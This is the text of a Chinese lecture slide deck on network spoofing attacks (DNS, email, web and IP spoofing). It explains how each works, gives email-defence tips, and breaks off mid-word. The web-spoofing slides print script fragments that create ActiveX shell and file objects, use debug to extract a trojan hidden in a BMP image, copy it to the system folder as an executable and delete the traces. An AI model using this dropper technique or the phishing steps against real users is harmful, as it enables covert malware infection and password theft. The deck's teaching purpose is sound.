网络安全之欺骗攻击.ppt

网络安全 第6章 程序攻击 重点回顾 逻辑炸弹攻击 植入后门 病毒攻击 特洛伊木马攻击 其它程序攻击 第7章 欺骗攻击 欺骗攻击是网络攻击的一种重要手段。常见的欺骗攻击方式有：DNS欺骗攻击；Email欺骗攻击；Web欺骗攻击和IP欺骗攻击等。本章介绍这些主要欺骗攻击的原理、实现技术。 第7章 欺骗攻击 7.1 DNS欺骗攻击 7.2 Email欺骗攻击 7.3 Web欺骗攻击 7.4 IP欺骗攻击 DNS欺骗攻击 DNS原理 74 17 8 1 第7章 第1节 DNS欺骗攻击 DNS欺骗原理 假设当提交给某个域名服务器的域名解析请求的数据包被截获，然后按截获者的意图将一个虚假的IP地址作为应答信息返回给请求者，这时，原始请求者就会把这个虚假的IP地址作为它所要请求的域名而进行连接，显然它被欺骗到了别处而根本连接不上自己想要连接的那个域名 对那个客户想要连接的域名而言，它就算是被黑掉了，因为客户由于无法得到它的正确的IP地址而无法连接上它 第7章 第1节 DNS欺骗攻击 DNS欺骗 74 17 8 1 65 第7章 第1节 Email欺骗攻击 Email欺骗方法 攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序 第7章 第2节 Email欺骗攻击 Email欺骗实现步骤 SMTP服务器 允许匿名登录 填写假的名称和发信人地址 使用web形式骗取密码，或者使用附件植入木马 第7章 第2节 Email欺骗攻击 Email欺骗的防护 查看邮件原文，检查真正的发件服务器地址 通过邮件链接网页的时候，注意真正的网站地址 在不同的应用中，尽可能使用不相同的、无关的密码 第7章 第2节 Web欺骗攻击 Web欺骗攻击原理 攻击者通过伪造某个WWW站点的影像拷贝，使该Web的入口进入到攻击者的Web影像服务器，并经过攻击者机器的过滤作用，从而达到攻击者监控受攻击者的任何活动以获取有用信息的目的 第7章 第3节 Web欺骗攻击 Web欺骗方法 改写URL Web中的脚本 第7章 第3节 Web欺骗攻击 改写URL ① email with html links seems like Microsoft ① ② ② / ③ ③ ④ ④ html page with links like : ⑤ ⑤ html page with links like : / 第7章 第3节 Web欺骗攻击 利用Web脚本进行欺骗 原理 攻击者设计一个网页，并诱使受害者浏览该网页 该网页中包含有一个图片和一个脚本 当浏览时，该图片被下载到受害者计算机的临时目录中，而脚本被运行 脚本的功能是将图片中隐藏的木马提取出来，并设置为自动执行 第7章 第3节 Web欺骗攻击 利用Web脚本进行欺骗 基本控件 a1=document.applets[0]; a1.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}); a1.createInstance(); reg = a1.GetObject(); a1.setCLSID({0D43FE01-F093-11CF-8940-00A0C9054228}); a1.createInstance(); FSO = a1.GetObject(); 第7章 第3节 7.3 Web欺骗攻击 Web脚本 从BMP图片中释放程序 set Lt=FSO.CreateTextFile(path tmp.in) Lt.WriteLine(rbx) Lt.WriteLine(0) Lt.WriteLine(rcx) Lt.WriteLine(1000) Lt.WriteLine(w136) Lt.WriteLine(q) Lt.Close Web欺骗攻击 Web脚本 从BMP图片中释放程序 WSH.Run command /c debug path tmp.dat path tmp.in path tmp.out,false,6 On Error Resume Next FSO.GetFile(path tmp.dat).Copy(winsys tmp.exe) FSO.GetFile(path tmp.dat).Delete FSO.GetFile(path tmp.in).Delete FSO.GetFile(path tmp.out).Delete 第7章 第3节 Web欺骗攻击 W